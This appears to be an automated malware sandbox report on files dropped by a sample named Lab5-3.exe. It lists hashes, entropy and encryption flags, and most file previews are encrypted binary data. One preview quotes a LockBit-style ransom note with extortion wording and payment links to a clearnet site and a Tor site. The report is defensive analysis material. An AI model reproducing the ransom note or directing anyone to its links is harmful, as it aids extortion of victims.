                                                                                                          SSDEEP:6144:a+EUEJDFJ7pshSq6FOOElB/YTDu1lEpXujzDzS0RZiAqZ:a+/E5NssJ7qN6SlEoPDq
                                                                                                          MD5:BE07B95FB41444FB2B2F1CDB3FF22A21
                                                                                                          SHA1:BDA89EAAA7E991D63AD69A65ACF129AA3191F45D
                                                                                                          SHA-256:9FBC9760E6BDCDF3C9EE32A858685B2692D26B087D03132E0314FB990FB9EA18
                                                                                                          SHA-512:81EB2D33230F60F5DB65A7358F946D7F68CDF8CE63D2CCF3DD89527A2C177C9172DC2E432CBCA57EFC3EE8147F202EAA7CC9A3558A7178ABB50A18DF4504F18A
                                                                                                          Malicious:false
                                                                                                          Preview:.U._.Q.g....=.......@...=R@..>.M.n ..n..\....?....[`.q....L>83..6-.">...fq..G<5.Y.2..^.....l.....s..H...N......j....<...*..e5..l7..q..r...\~.....6.A..}....../.*..tQp..[p...ac..c3m...N...y....SNu.O..`b1......Xnr^.j{....c......vo.s. .........P...+.z+.h._..*..d......#H.. (..[u..u.urnw....;...... .UF.......Vj.?D............eo.a.}DL..-..n...}NI....h.]aa..p.-.G.C..H.(..o.................r.n.2..eZ..../..............]..$......o!....G......f...n......x...)X..T..%.f.d........p....l......N..5.._C..S..R...S..rax.z.oQx...7.b..0.w'.c...n......b%..T.[.cq...H...E7.[.t..H.> @K.....Y.W....u...Xk..N\sY3.[(.S"1...o.7..a..$..KzB1.........D6...U$.......6x.....@....RD...q...f..-......L...{..+....t... .17... ".{.....p3...m.]3H. ...d...:......:....\.V..Q....LU..0..l`...s.-r...J.O..m..J..-.gp..... ...l....W4.|....Q%.....s.%*.....-4.v.aK..)3.8...`..`.....J...=..E.N.X.Y..$.?g.\}.m$..FHX.L.z.R...J..z...8..8....f.nm%.mE.s.......>>......y...s..........._w.P'..M.\n.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):92624
                                                                                                          Entropy (8bit):7.997819264352441
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:CUK8IxHRioJPrFV/5N0tjvEUl4ETYnyGX7DESvyxlziAWZFReG6onjDa1iIJ+aBF:CUEnp7/5+tj8UvSk5xliAUyGju1h+aUe
                                                                                                          MD5:E123BD91252F10B4A5D0A593844840F0
                                                                                                          SHA1:58EE726B92AE319301E455A80CA15B060ABECB55
                                                                                                          SHA-256:AA4B0664BB46D3832459571E8C3CB92F0F500C347A3976850B383578872611F5
                                                                                                          SHA-512:537B8CEBF98A63974102F769CD635CF5B31E3A1012564D383845CA1B8878C08DE8AE327899B648886FED199C86C7B7B3CC4F393A97477643AD5AA025E1FDBA17
                                                                                                          Malicious:true
                                                                                                          Preview:i.W..5..*.?.....v..,.%\...g........!..'.G..K...MO'....4.zc.ea.......j.....G.a....+.4~...X.4t..6N....:b-..w.)...=....o.^. ....e#.t/2..C..9.j...>.d.*"z.LSo...l@.ENm.{N.mG.U...i-........p.an`O..SZ.mY.GX.M>....E..H....X.'sN.!z..\4\...G\...`....../..bd...Y.#..j..-.....j..<..Q.?0..@...0...^.I.^ ...6.....p..H]./.v.,..b.x.e.>@...........T.j2.+c..).!9l.SK.lh...^.}...S...?!.2..(..JV.42..&.7.i.4.. :..g.D..2..E....1n..78!...'..S.`........^.......oI...I....%...@..e.k.x.%...%...$..$....s.j.,.... ..(n.....,............d.....F...^xq0.<O..6ej.G.9.F^o.\.G..!..&...R.Y.!...1..;...(........L.p>;*....<4N..X..S0.:..n..|G.K..E4.[7.a2b.._.4....u~k4...$.p5.&....V....../z...eN.3.j..`....A..{x.>../...].-:!....:5o.:./.1N..Tw..4.......F-.....6.....\#..AD............b....0-zu.+..<R_K.....i.K.z.9.G^..Q\.. .5L.<..6.rs...Dv....]d........B...BqC..5S!x...iq.G.O2m...6..i_.....W..$.xbm... j&..uf. .1.3..%..J.x...rv.3.Y....8.:.b.=!<.z...H.].B*..'.TP;.....F..=..@.2....R. .
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):188576
                                                                                                          Entropy (8bit):7.998982949752943
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:3tgfSbSE3mVWQJ5WaYwJTrBDb0FI/Vdj8Em3/66WmI4zvZZo6KApNLaFq8LuZ:3teSmVWY55JHWI/PQEg/669o6KAhY/6Z
                                                                                                          MD5:5DD85A7F62E5D260147EC6D127380B8C
                                                                                                          SHA1:2909904C8450C6C2A167B2918264571702F19D88
                                                                                                          SHA-256:68DBDCF0995EACB5F007E384675D6B8B74A59A177F73107CE33E3B4EA0487070
                                                                                                          SHA-512:61B938657821BC46B53985BA0E28EEA9AFEAC3DBAECEA3E8E4E66D5F9A989634D02984F8281BB0F2BF04D5F2FA6260DF86BAFB628761E15608020331E1328F33
                                                                                                          Malicious:true
                                                                                                          Preview:.EX....Q....`!.g|.K..,....y.?..$Z.&^.xf.......2.}.%V..._.P.3......S....c.....k..t........#N...{..%....%Q.{F.m.w;c...%....1.3.V....D..r^.1(&......xj5....E.T....UeKK.c..j.0#.....}.v.B4.O..(..Y.6...L....M..3=.....".fx>..D...ZHf7..]....9b.R...0G....K........."..o..}..o..&..[.fU..rJ.......7b..D#..........c...o..1.6..g......&-H..".V....x.N..q..^.u...3{.,;...#..\....D~.........2....|.T.9Yh..l...#.a.^"..}V.....Tl.)...H.UA=.P...s.C...Y..1.?L_V.......W...h....^g...|=f1..N.g..6.fW..*.A.j.0...[..A5oL.....r.....#.5Q..\<..{....m....r..P...x.....-._.E...+.vLl....~.Z.XZ...{......z.N.C...f.+.C....q~..G...Y...S#m.z.0.^....Z.nDP....av1....'.}....0Z.....@...h.......lT.V+.p...}A.K}.aV@*:.Ye..U..Q..........L.\.......=.NH..h.f.A.....c.V......!.....L.1h.\+B....<..'*r.!.k`0.....z...h......(.S...r,ri.0K.yP...\..M..M..!..M0oKaktb.xz].i.......Jtu..5w.....b.U)TN]BL.....x...jQ(.NG_.6..........&......jGL..V.).+...w.f..V6..iGS.....S..OS....P.. .
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):123408
                                                                                                          Entropy (8bit):7.99865060505472
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:Hl+Rp+wIKIcif/KF2Ajw0D+MG91hTxAcHeHmZ:H7PZf/O2A+v/1uCZ
                                                                                                          MD5:620F19585AC17518EEF13BA86FC442FD
                                                                                                          SHA1:5BE487167EC82D318B3FBD630FED04295CEC3385
                                                                                                          SHA-256:E0476696139C0C931DCEA044B73E5E2F88053F96CDD470B4F808FA1C30F82C1F
                                                                                                          SHA-512:BE8DA57D80F81A82C4889D7B6BD8B2131F208FF0266F4D18FC508964F846DA828365BA77BF91E2F4FA8171C719B486BB9525B9E821DEC2CCDB184B8A99240F92
                                                                                                          Malicious:true
                                                                                                          Preview:.g...;.im......h ..........+"P.k$:..i.^nEVr...2.$....~.....]*a*<;....jP[^.!.`0......QJ.....m...]x.. j.o..D..H.$ww.#..`.zS.+...Zm'...^....t.....X~.@]v...x..~9*..~.>.&.z.z.7.........bM......$!...R);..X7.f....A.o~...q......../C.B.b..y..Z....+.Bq....Q.fj.+.QSowx..<..[......?[......O...q)I.]..s.....W{.'.&....4M\...9&.:`.|D.2_D._S...P..|..6.5pP...h.wT.9ir....'4.3..!...^w..^Vha...........Y.G...w.....1..U......3...$.l.d..D.....X....='.u...:ccY....t......'....s..LD5....$4.S..O..o.r..B..G.2...|)Y}}5.~........2...OL.i.OE.|....4 ....q{!..1.i./.=.~.~..........k......c....5O%$..UY`.V0...~....!s....G...Q.......A..T6...rrd..4jU..q.O)D.M..{q+Gj. .(..4.*./.Z..`c._...~..pnY.xwd+;....NKx'A.FF.G....>...+...5+......7..........V6..z.]y\....^j.E.S@.1 .L.K.Q...4.x...m.r.,.I..6.+..........@K.f..:.m...#...YC.c.(..Z..I..z5D.V..c!..A...m..5F.5.l...6+..L.o&..`._^.k....I;..S.&[.].......3.......8.. +8gh.7.:.:C.....N.p#|..F.......EP/......t.>.#....)Gzh...0.5..w..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30784
                                                                                                          Entropy (8bit):7.994108386086651
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:6Md8f1bz4uAFHVZBDY72bHv4uvOKtaWrnSxtNfN/Y5XMMxliSi/JTOZ:6Md8guAFHPBDY72bQuvNIYSbNyMmPIJ+
                                                                                                          MD5:4F4E0C63044A2C821751BF08CA89680B
                                                                                                          SHA1:4430D4453A186191E183E191DFDB9D0FCAE0207B
                                                                                                          SHA-256:D5025A810422AB6FBFD188AE32B9766174A8866E0990CAF500A01C441B427A95
                                                                                                          SHA-512:3B74B79CB197D65DD8B6D3E0C97C835E7AD6D7F29B39DEC44745FB0B8E705822880879AAD78EC60451959B7D9E6D4CB523602CFBD380E9A5C9B2AC6B8211D00B
                                                                                                          Malicious:true
                                                                                                          Preview:$...2K.....J...un.d...P...&p&.......tO.*..U=~....)..$0.rl&..-w.u3..o..s...8.h...|.%..x..+...q.FUR..0"p.iu.^U/.F...u....3.%.....+]...M.L-......r....C*q......j.9]...$......".W..........H..E."..........?I.hdp.:....-..0.|....A..N.?fP.....jc...hU.....Bg.e.."V#._9Njv..}.vP.qZJ+.L."..=...AD.t$.JGD0..6T$E....ji..".e.hs.7P..(....K..rl.j.ge....?...r.....P.K6q.......<..j..y.=.T^.F*.....v..d..<S.=..2D...|.....u@G.........\.D.M!R<.\.^..KIF..].$v..Y..l...x9.0+.f,.......[..Jd..7......*.(c......h.H.,...T..fQE..N.......G.>8....I._....Z.........M....G.._^hqkp.."...1.?.[..c..U.....qD.\@|`..b.>..........<q<EpL..R.b......n..${T..f.X.[.......t...:0..a06.((-......C..Ld6..3.I.o@o!..H...\.....!7..|...{.q...C;!...fN..C.Ul.<G. ..,...m.@.i....<.L.X.4E.!P.k....b..u.J.%....0.*!.#.w./....pH.d6.V.[L..r]:...g:rI.2. .x.|..5.|4......3?=.-R.L...P..If........b!.Qpyiwii..j..#(S.)..:.v..1.......R>.q...-..'.E......x.O...A..H.....b%.X....f.....#X...#..je7K..S...Xl@h.;.Y..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):101504
                                                                                                          Entropy (8bit):7.998416319287746
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:i/NGE996h3EQ2T9mM8NZluZDa5x8pJHLHZ:i/NvoKQMaZwsAJrHZ
                                                                                                          MD5:7BB28BE2D70DF2D15304D6AE7073987A
                                                                                                          SHA1:BA31190938D0026DE945606B96BDA79B7789F83C
                                                                                                          SHA-256:219748DEBA9AE24F7DEB1CEAE18B0614AF4E20C1C588320F3309A5EA7776FD24
                                                                                                          SHA-512:3C880E3637509871108CED3E0594FF73B333029C85C08E45C9D5392D6075426297A6D78F583E763F260A6F8CCE5BC547D83EF3D789106D12CBE8DFFD919AC2E4
                                                                                                          Malicious:true
                                                                                                          Preview:.<...I..kX!.Q.+.v3.....g..nh........iG\*..ir'..>'........f%....g%..D2;w8Q..r.P.O.#Q.L.......f....6iEJ.).{%.K.w..8v..'....J.9..+..%.......F..2..!..f.Gv>....L....:][;...'..s...../.ks....'.2..*6..w....v....,.......p..2.(...6Q.Z.........w.......R...N..B..o.J....\..).+.....3....%.:&\...m..&.l+..f.&8. .*....,..S....0...7W.-"J......W.........PI.4.@A..n........Q....".P.]...N...u"5...:..K.cC..7.q!./.......is..r.l...A.S=6..Ff...i.........j+LB.A.)''.......mC2D".....p.z..~'H...c.._x..".}.x.,{.;C..)^...w...y...&..o..y4.R{,...M.'..#j....v.ZT......=K.....I..b.B........`..Z..s.L%v'.i...R...K[......s(...v....]B...D.M.&....#9..r.$.xT.L.Oc...B....C.`H...5D_.D.y.k..........9SCNJ.......Au.3..1g@..>PH.@..q.........+<,XG?.p.9....V.g.......c.(...}.."..k.]./.E.|..2.7..vx...f.........BKq..x..Ws1k...F..g.L.N.l....$.g...H"8.oBj.nfB..CJ.D.`B..X.d.W>..'y..G..nN......~$..u.L.4...p..Np.m...o .Q...=.........o.k.d....'..../.\...PK..w..tiu&).P0..s/.@..J....L.9t..p...:..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):333373
                                                                                                          Entropy (8bit):7.995697878587583
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:GAEia4gGR5VJZwnE3fDMJK7hfE9XtoXg7gAjWuqAecn6G10mdlmh7OuZ:ZEia49xwnE3reK7t0gbp20am7Oi
                                                                                                          MD5:909D6B227373FF77716053EFED633858
                                                                                                          SHA1:95C0A02C0C86F9AB0D10A4533D9645483D0F9440
                                                                                                          SHA-256:A607399E099D9DF9D95BE53A230876E1E4EC8C187BED9176E324D8405C792D09
                                                                                                          SHA-512:3366240DA079EA28DA623A4322A674C1C60675265F045C223B5FAECA3B1256CBF72B518F27D6F9DA4A40A37501544D09ADE8A2DA49D32FA45080F8FB4874FD06
                                                                                                          Malicious:true
                                                                                                          Preview:q6.-0..T..Us?a....8.......eK..&u.\>....8E............Z.A.+..?..r.......)..K....\..$.M...~,.2..Nh..34S.D52...02..^.GI|i..h.Y..n.......a....OED.9..1..t.J.5X..#9.-+H...1hMII.u..._c..d..._..XN..L..E"....@@..3...k)..x......&.[.@g......Z.6BO.&9-.Gc]m.S.:.`d....7..d..MOO........+.F4.X...U.=.,......G.'._..Q........J9,|.......S*%.V.'.D..9.....F...G.....e ..fsm..J... .(..r.N..p..(..n....7|"am....mlV..BpR..H...%o..s.sR {..U._.{...h...O9..#.2.i}..F..N.6yg.@%..Y...O....L.....U.^_....m....m..;.3Jgi.......k.F....,.[.\......D..W3.......R...-....3.q..7......~p6=...l.K{2.....<#2._.@8.=Onk... .J.o.Q.[u......B..../vE.t.<o.l..:Z.Y\.........k.7vz..U.)?..<.<...@.$m.-...U.e.HG.[.3.W.*.:m>.3K.k.......e...w.kk.D"e.c..4.).D?..9.S.).5....8.{.3"..3...n."Q\.z.H.....j{7...S.<......[...y>.v5_....~.1.d.q..r.3Jf.w}a:.d/..T.b..._L2..q..-.......re.WN"'.Y.-^.._K....8.!LJ..;q...|&..7..g......O..g...9..3.RZq.#.|.}b{..EhW.............~.Q.jV.:...j.m.O qfRD C..Jsp.n...U.!WKr
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11184
                                                                                                          Entropy (8bit):7.983407519206857
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GR1IjQjGsdl5/V8WyRAqclPU2rPh1ZLvHPBBGm9Osn1h0adE0Cb:GR1CQjGG5/V89OqclJ1ZTvPx9hdEtb
                                                                                                          MD5:46CB8C7B7252D886C65D27EF4CFAD1A6
                                                                                                          SHA1:53FF4DB6378601AFD5CE3789751834F7ADDB1221
                                                                                                          SHA-256:67C3DC8D42C78E3D621B0E6DA5ABD398123F4D93CAE98929C88B2036C18DF2A4
                                                                                                          SHA-512:CE4BA1EC85A6488E42E1755446F60239033F7A51BD568AA4FCCE4F0566969E4D0F61EB96C59E525D3410669B2B6E55006EA9BAFC3F3AF3A2F6081A0924E4ED86
                                                                                                          Malicious:false
                                                                                                          Preview:...=.3D.}u{....._.g$|.S.Pf...e.GGW....w+g>...B._......=3.GiU...{....B../..........|.....@.......l..V...q3..9..0.~.CH}x0....{.$.l. v..j.\G.I.R.+......l....../...w.Nr.d......&.4`.....J...AA....~....]...k...i....|O.Q.sv]q.E.\{....Q.......r .V........<.*u0EO.4fe.0.+.....:.9b...l...Q?%.B....[..\\.-.UX..i.u.N.P....3..9.)l&...0P.].z?....S3.I$..bR.p.6#8......6.....I..q....Bk..4..-..~;.J....+...X..D.)...f....x.t;.....y...eu..M5.o...:.{A....W..9.T..*..9...:s...e@-k."..Y.._..2...?.........$Rd..RT...d>.....O..-<.d.....&..,)(..+.PPKh..z....F......,...N.g2..1.. ....y.g..a..9+.`ND..E...B.u@....]`1..cH.O.=..4..b.z...+!).p....v._V..IQ/G..Om...F...'I.9b.7;..7......~..B.c.....a...[/n.`9Monm4.!.q..FQ.3.<.J...ez...@0.J..........b.6...E.+.|.,...Pc.....\..{Z%.Va.,.S[o<..<..OD...H..2..'8X."W.sL..:.j.0.......,Q...v.>..k..F..a.B.T.m..K..&.:..B..Wy...W...u..X....j.I...x.xZ._.............._a....^.[.J....*W.&......002.V...{.._....s..B-."'h.....l.#mq.}./......&[,.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):321070
                                                                                                          Entropy (8bit):7.998178924575073
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:1ME0RK/V16cnWjOvScjq1AR97seCWkf7SN8VMRe16ZBUBNA1/QMcKT/Mn0xm7HZ:1h3GO1jqij7seCvGNT0wZBUqIM1Yn0Ut
                                                                                                          MD5:9EBDE6243F9BA657D9C2493382D90345
                                                                                                          SHA1:C77736C4CDAB9BB789DBC6FE8CCBBB7C13A967A1
                                                                                                          SHA-256:9C195F5505EF19F71F4CD52B8A732A18E8F47F35544DD17A93EC84EA472F659F
                                                                                                          SHA-512:4B942310A98771997D49593755D77ED66C04FDF33001EE06B4329FE3131C3AF3B529DCC090C5A9011A3B6D94D8BA70C03AD83C8B21CE634357B504C05FFEAFDA
                                                                                                          Malicious:true
                                                                                                          Preview:..z5.2C..z..Z_iK#..v...Ptv.~.....wQ.C..Q.....%t.Zg#@h..Z.........'B.*...\.X.*k..!\..;..H.m7.=.{=..1?...Ib.....X.K.0.X.E.n.Oj.z..|.J..B.._.....DEa..<.U%)#R8.....7..U.5... ../...[u..z..X.p........... ...T./..J.Hi.....@..p:..p&..N....@=.6..$.g..}.....H.....?.l{&..t.a^..9a.....L.gg.F.L....5q..'u~`Nc....*........=uw.E.J..J#..,.g{..&..tWPo#S....>r......VU.....B>..c.}.$.Z.E.........w....Q..7.2.YWD....L"1d..^.9l .U ..$...7.9=..-Gs.y.....xu*5...`..l.^./.mEyjP.........C..Z...uW."...<.=n.BI..|...bc......Iji.3..)..fo..]Z.........7...f.....O.x.C...w.b..yd..].A.I......=.M...*&.......U.:.....&./.+K..T...'.ky....,>..e..J[...3c...e6.Ajl.yu..y.....^....B'.!0..V'.=.T..[?_.c.../....k.X.o.Vd.fr5.F......'..{...Ih..R...c.......Ct1.A...<...n...|.MUp.......,w..O).3......gq..{.d.=..Z..4. k.k....r.......b|%0...eH......x...l..,.Bb.;'$.:....>o....#.0B-...4~c..%$..-R-Z.1(..RI../@.R.o.aA:uD1'J.X(...x.OGr.K1..Si@j..:.....dz....>...72|..Fi.t@......P.\.....+........@...o...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):264110
                                                                                                          Entropy (8bit):7.999312379045429
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:DFm6/25kwSyNuuY03lYNsV1sCdsfaesuYUVF9Elmck6iHnZ:DQ6Skw5HY0iy7sCwaezYU0m4i5
                                                                                                          MD5:0600C9511EB23B10B9FD45A6B06023C1
                                                                                                          SHA1:D014784B74CA69A8EAAB48466D2E4345EB713EDB
                                                                                                          SHA-256:3A113B604D6E6F210243044916D57A59B8B49B99F96BFD3F000B291402EF738C
                                                                                                          SHA-512:CA1D911F4F4CC072C779CF61E78D7A49EEE7C33EEDD64D4F8A412B87874D708DB81B4CF61EC02C962A1FEBBD5A0BF134F5D8B8256A98526D08AE771986C84494
                                                                                                          Malicious:true
                                                                                                          Preview:Z.. ....b$w.......n.]..7E ...By....3.K.2hD.....&.9..L..|...Hm.@..m.p..-.R+....S.&....M...K..SW..m.i........,f.Gz.}..C/t..P..\e...0.n>.#..6..^c..Bn...0<......[.p...:fS..i}.R.T.T........y..%(Y2..w..<..u...Xh41.T.#I....w..V....*.G..'.4F9z}.5....h?.t....+.alQ....y.i.A.a.z=q..0.......Q3..."O.<.TA....?B..$...)...C..Q.......%.....72..#...Ib.{3e.D.....c5.6..D..U7.?.._...vI..R>n........f..@.a..2.U...r.X...r.Cp.f.m....G"J.]...d.imZ5..+s....$.$.\Z..VV.r.-......HG".....d%..t....;a........I.ii.........Y.(...c*..Y.....E.....~..{.}b7.$zha.......zb.<t. y.....^v...TH.M....t..%...7.|..}..(..9..N......h...5.4.j.9.2N.[..i.u_.=....+....-..R..h..F#..s.`L.kyN...YM.....;.I....i...a*7n.......r=...Y.O.D...ggda..wv.<.F..>.Hn.ce.v.@.j.Nl'...,..:.X.%<.7F......@{....h"<9.J'.:..q....e....&.....,d.2..-.nW.zu.|...}".....P/*u.Z..3.6...~*..y..x.'V....B....gC#.Y....G........b`.{....h...,...5(..,.D...>l[..j..Py...q.o..f.C.....l....{..?.p%ct.3'..........*b..-d..A.Z.u!..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):39472
                                                                                                          Entropy (8bit):7.995588135350621
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:LlT9YuonBy+AZiQUyOSqmYwfCdlB0WtkE/h8te/wgzRFO4lhldWlgOnsqlZ:Rm7BIKrmYwfCmakE/mte/RQ2yFsqlZ
                                                                                                          MD5:D4D987A3ABD6C514D10C3E60408C665C
                                                                                                          SHA1:8DD450E49A444AC2C2108D0E61BE58E04B9CD3D5
                                                                                                          SHA-256:3CB2A05C507DF480667777CCD3406985740AC6A042C5FB41C1CD4285A5F5D4EF
                                                                                                          SHA-512:F2E107D0E7E57DD13879BF32EF52FF0C6E0E34423560E3B9F602000589FC5D85AA15823F0B1376CC33A55BBAC267DE9CBF751EB0C4F06B7CE9F89787A6487FB7
                                                                                                          Malicious:true
                                                                                                          Preview:.v`.....q'...P..&..j.4.&..N...4.U.I..P..HZ.w.......og...lS.B...B:.......3..b2.j..5..ekL.Y........}&.ua"g..I..J..lh...}.C|.X.\`j..........yB..^y)..W.....(.'.Pq.!K....C...O......x...8....M..~...w.M......y.E....p.:'.L.`K.g..V!.4.Yp.m.I4.d.j+.:.[.7._.:..)lR..H.)..7..Z.6..J.e.....gf..C..,..P....(.(.......R2.Q.vx....G.Q..D.....~..R..z..#..F.H+7....5.B...v../..}.+......'....p6.,...)..Y........ ..W._..q.y.wU$B..9..Q....OiF..8..lO...........d$a.`.r#......r)S..(.C..@.j&..8.U{*BF/.dJ.....l7... .t...6.F..3\...KM...en.N.\...0{..R.ST....V.>.m[..vv2..fh....X.....Gh7.A.+..!B.....N.............=...e............L(..k..g.[.(..Z,.<tt.z.....t. .p.b...n-.K....k.v.|..b%..4:.....c..r&...l4.z.*J.r<.G.l6.Bkim..+....`....v.m.y..:.P../...O.lF..a.@....l14.Y..K....<....!1V...124...U..ys..dfF...-S...>.&.2.tX.....H4=...1.n.#"R.5M..z.;.p 6..{qT/..,.(..P...9.....^.W.....K.f..,T.N....%....... ...{d.O..pmC........jfxs..n...B.Y/...F..........e..V..C.z...\(.}..5.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):63024
                                                                                                          Entropy (8bit):7.997223417956495
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:hVGk3dVC6q/J23Xqi9TrcN8VGZKfjn+0ykBw4AZ:hVGk3dojAaiV+ZKfr+61AZ
                                                                                                          MD5:54D8DA6CB0F0793FCD28B0C456640B94
                                                                                                          SHA1:194F6036BC5CAE787E801613D81E9C712C4DE4A4
                                                                                                          SHA-256:DC52B2F75489AE8CC5F983F7A3DB4C45049B1C3430DDEC78775E099214710704
                                                                                                          SHA-512:C49824BC101B60348528FDA1973204CF5E359508D0184A8BA195D549AA2AD060A77F028F9C31F4E597544FEAD358F66740B66BA595710A37086F1C623DE33218
                                                                                                          Malicious:true
                                                                                                          Preview:.......~...~.(i.`.z).....9.....8..?..c ...cx83.....Oq.a%f......CP..y..4D....E..}..s.Po.....P.^.....1.{.&....'.O..W......=.We.c.N5!..%.....>..f;........%qw.f)....@.....h.V@R.....<I#.0.../.Z..L.".%.]...y7.}./0..*.]<R].o..../..P9..K.5\l.&^.Q..a(x3.....6}..tRY.2K5.. C".....W...j..Z.....\...;1.'.C[.T8....2.n.z...sM+$..B.b....6....>.vh.J.+~.>&5.6..y.Kk.....%....dZ...=.|W.m.P{q.B.|....qG.....\....r...M.f.4p..@..%....E..}".|..O.;...c.S.i..Bx...eT5..1>...........k_3w....Z./v..5.....E ..W7..1...h'.Y@.0......7;.H7...S....v...A .(..P..O...3.^F.K..eI.*m.@")....I.&'.h.4...]........3.hOdJpG. PV.)/7.}g1..R..I.@.m(....2.N........j.]..=....=..hEV+4,.5%.6xl..lVYg6.L'Q.N....5}G..B...Fy...q.X(X."Z.w...X..k.l.8....6..q. '$..E.M....6...::".+...`...,.4.~.L..X.83...>..9#...fk.s.o....df...h....y~fU.|F..9..fg2.di..~.\A..b.gj,T/v.......X.nT/....E..............o%.6..W..P.......G.|.....3Td./..dt..e..9@..:.O........I}....X....W@plgd.}...(......5.~.....[....W...:...0..!e....LO:...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):51024
                                                                                                          Entropy (8bit):7.996244161034979
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ibyu1QZScLPVpE4j0VrBO0q5Xvurh+EvbadaiPvHVjCI81eqy3YWeVfCmgIRUZuz:gN1/czVi1ng+hxvbGai3lOjnVYIR2pmZ
                                                                                                          MD5:1636CD5F1506631191BF05C1964BAE56
                                                                                                          SHA1:B66BB51BAB284216D9CCF5BFE95E37EFCFDB5994
                                                                                                          SHA-256:F74B36DF317BB34AC4C8E3D15E919C137D52A2D10F10BCF147A0C61DBCE4F5E0
                                                                                                          SHA-512:7BB9D969BFCB141AF61B52020409B86EEA60DAC4658A1B633BA10C852BFD4FEE0617D5E01E0A8ABBA9A7A91A2F57696E9DBF83F3530CC252CDE5DC33C843195D
                                                                                                          Malicious:true
                                                                                                          Preview:.'.......!9..*.LE....rt.L`.+.V~..pHR.au......q..[.}L..@../.l..d..Ai...]..._....].q.O0..R...^`...B.. ...~Yw.OC^Y...y:...Q...OAN..r......... ..<Yy.....^h].W...,..I2........>...h'W.......,.3.`.7.6._..(..;.5+....5......{i..5u....;..8.#..m}.e....j..<....fq.j_..L.@.. ......#F.^.du...'"d...!;g..M]&X..E......,....Y.'w\..."t....N8"(E.?......^....Z.}a*.. .>'...j...\..y...T..e......S...2s[..h*.q.\.#...G...*GV.[..l...pq.w....$.<...J......l.......IiFB...%............8.....C..@...k....X.d~..{...)._....D.n....+.....v15.G.C..,5...e...........c%.\$.7..X.^..K.....=.;.....5%....,............ze..9...W.]4g.k......G%.....M^.G....v...5..o.....n........(.#.;.xq...}.L..>..]".k.O`r..{.......q.c..L..9d.-...8&..=.b%..A..2.....mm......z...=....<B..w-<...#Fr...)u.4V'0.b."...)YtC..F~l..n.../@.....B....Y....8..$.....a.-i...8..........2\{...L..;D.E........z...3j..{....{.X...BFN.=f...{^q.;z}w.k...m....E[.N.....K0...{......].i.#...<..TS..=......{`M.i..0.....r....7TP
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):81312
                                                                                                          Entropy (8bit):7.997675081980327
                                                                                                          Encrypted:true
